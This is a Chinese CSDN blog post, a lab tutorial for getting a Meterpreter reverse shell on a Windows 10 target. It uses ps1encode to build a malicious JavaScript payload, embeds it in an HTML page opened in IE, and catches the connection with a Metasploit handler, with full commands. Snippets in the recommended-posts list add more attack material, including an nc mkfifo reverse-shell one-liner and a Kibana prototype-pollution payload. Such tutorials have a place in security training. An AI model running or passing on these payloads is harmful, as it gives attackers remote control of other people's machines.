基于JavaScript的rce反弹shell漏洞

最新推荐文章于 2024-03-20 21:01:27 发布
最新推荐文章于 2024-03-20 21:01:27 发布
阅读量3.3k 收藏 10
点赞数 38
分类专栏: 渗透 学习技术 文章标签: javascript 安全
Powered By 行云博客(https://www.xy586.top)原创文章,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41679358/article/details/108061433
版权

本文转自行云博客https://www.xy586.top/

文章目录

环境要求

kali攻击机
192.168.232.131
win10靶机
192.168.232.140

工具地址

https://github.com/CroweCybersecurity/ps1encode

攻击步骤

拉取工具到kali的根目录下

git clone https://github.com/CroweCybersecurity/ps1encode.git

给权限

chmod +x pslencode
拉取工具

生成恶意js代码

./ps1encode.rb --lhost 192.168.232.131 --lport 4444 --payload windows/meterpreter/reverse_tcp --ENCODE cmd -t js
生成JavaScript代码

将生成的js代码放入一个js文件中,并通过HTML文件引入
html

使用msf框架监听

use exploit/multi/handler
Set lport 4444
Set lhost 192.168.232.131
run

msf

靶机使用IE浏览器访问做好的HTML文件(此文件引入了恶意的js代码)
在这里插入图片描述
在这里插入图片描述
成功(PS:4444端口没成功,临时换成8848)
在这里插入图片描述

行云tack
关注
专栏目录
漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
09-08 3001
Office中的WebExtension是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE
禅道项目管理系统RCE漏洞复现+利用
热门推荐
0xSec
02-01 1万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
反弹shell汇总
chang113的博客
06-12 775
反弹shell整理
Redis RCE 反弹shell 漏洞复现
06-07 1128
1 Redis简介 Redis是一个开源的使用ANSI C语言编写、支持网络、科技与内存也可以持久化的日志型、Key-Value数据库,并提供多种语言的API 环境搭建
利用js文件反弹shell
chaojixiaojingang
03-17 1万+
1.环境 攻击机:Kali 192.168.42.138 靶机:Win7 192.168.42.139 2.安装工具ps1encode 下载地址:https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.git 3. 利用js文件反弹shell 先利用ps1encode生成js payload ./ps1encode.rb --LHOS
[Shell]利用JS文件反弹Shell
baguangman5501的博客
09-17 437
0x01 模拟环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 0x02 工具地址 https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.g...
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)
qq_51577576的博客
02-18 580
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600) Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。
Kibana未授权访问漏洞记录(CVE-2019-7609,Kibana的RCE,原型链污染,端口:5601)
墨痕诉清风的博客
11-12 5259
漏洞描述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。 漏洞复现 环境启动后,访问 http://your-ip:5601 即可看到Kibana页面。 原型链污染发生在“Timeline”页面,我们填入如下Payload: 创建文件 .es(*).props(label.__proto__.env.AAAA='require("chil
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5557
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Python安全脚本之RCE反弹shell
最新发布
weixin_60830484的博客
03-20 477
本次基于DVWA靶场进行的一次针对简单RCE漏洞反弹shell脚本的编写
反弹shell的命令大全
G3et的博客
03-21 914
【代码】反弹shell的命令大全。
msfvenom
jsd2root的博客
11-02 525
1.msfvenom的基本用法: Options:     -p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定     -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: pa
下载量超1600万的热门开源 JavaScript 序列化包中被曝 RCE 漏洞
smellycat000的专栏
08-20 665
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队最近,热门的开源NPM包serialize-javascript中被指存在一个漏洞,可使攻击者执行远程代码。Seria...
VM2 JavaScript 沙箱库中存在严重的 RCE 漏洞
smellycat000的专栏
04-10 970
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士热门的 JavaScript 沙箱 VM2 库中存在一个严重的 RCE 漏洞 (CVE-2023-29017)。多款软件使用该哭在虚拟化环境中安全地运行代码。该 VM2 库旨在 Node.js 服务器的隔离上下文中运行不受信任的代码,它允许部分执行代码并阻止对系统资源或外部数据的越权访问。VM2 在 NPM 包库中的每月下载量超过1600万次,用...
反弹shell命令总结
weixin_43263451的博客
08-16 229
nc反弹rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.253.131 8888 >/tmp/f 剩下的常见反弹shell https://blog.csdn.net/weixin_44288604/article/details/111740527?spm=1001.2014.3001.5501 ...
远程代码执行(RCE)漏洞
谈谈1974
01-09 5198
文章目录1. Fastjson 远程代码执行漏洞2. 简单复现3. shell 反弹 1. Fastjson 远程代码执行漏洞 最近读到一篇文章 Fastjson 远程代码执行漏洞分析 2. 简单复现 攻击机器执行命令 nc -lvvp 9999,监听本机的 9999 端口 目标机器执行以下代码,会新开一个 shell 进程,将自身的输入输出通过 tcp连接传输到攻击者服务器上,从而渗透入侵。以下......
pikachu之RCE
Alsn86的博客
12-08 131
pikachu之 RCE exec "ping" 输入 423.1.1.1 || systeminfo 由于ping 423.1.1.1是错误的 所以 || 会执行systeminfo 看一下源代码,没有过滤,直接进行拼接执行了 然后把shell_exec执行的结果,输出到前端了 exec "eval" 看了下前端,没看出名堂 看一下源码,发现直接把txt放到 eval里执行了 输入 phpinfo(); 输入echo "123123"; 输入 echo '<script>aler
某设备产品漏洞挖掘-从JS文件挖掘RCE
HBohan的博客
11-23 2820
前言 某次渗透过程中碰到了个设备产品,通过一些黑盒测试小技巧获取目标权限 信息收集 【点击获取网络安全学习资料·攻略】 2000多本网络安全系列电子书 网络安全标准题库资料 项目源码 网络安全基础入门、Linux、web安全、攻防方面的视频 网络安全学习路线图 首先拿到了目标,同样也需要对设备进行信息收集,登录页面有滑块验证和账号密码请求包加密 暂时先放弃从JS里获取密码加密方法,先尝试找一些接口来获取信息,查看源代码 访问一下JS目录,这里有一个小技巧,当目录存在时会自动在后面加上 /, 例
nginxWebUI RCE反弹shell漏洞
08-16
根据引用和引用,nginxWebUI存在RCE反弹shell漏洞。攻击者可以通过在nginx服务器上添加特定的配置,利用该漏洞执行任意命令并反弹shell。具体的操作步骤如下: 1. 在nginx服务器上搭建一个nginxWebUI,并添加如下配置: ``` server { listen 监听端口; location ~ () { proxy_pass http://shell-ip/文件存放目录/proxy.php?url=http://$host/$request_uri; proxy_set_header Host "访问webshell所用域名"; } } ``` 其中,监听端口是指攻击者用于连接的端口,shell-ip是指用于接收反弹shell的服务器的IP地址,文件存放目录是指存放shell的路径,访问webshell所用域名是指访问webshell时使用的域名。 2. 攻击者可以通过访问nginxWebUI上的特定URL触发RCE漏洞,从而执行任意的命令。 请注意,这是一种恶意行为,严重违反了网络安全法律法规,强烈建议不要进行此类活动。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Web渗透中的反弹Shell与端口转发的奇淫技巧](https://blog.csdn.net/nzjdsds/article/details/82929265)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值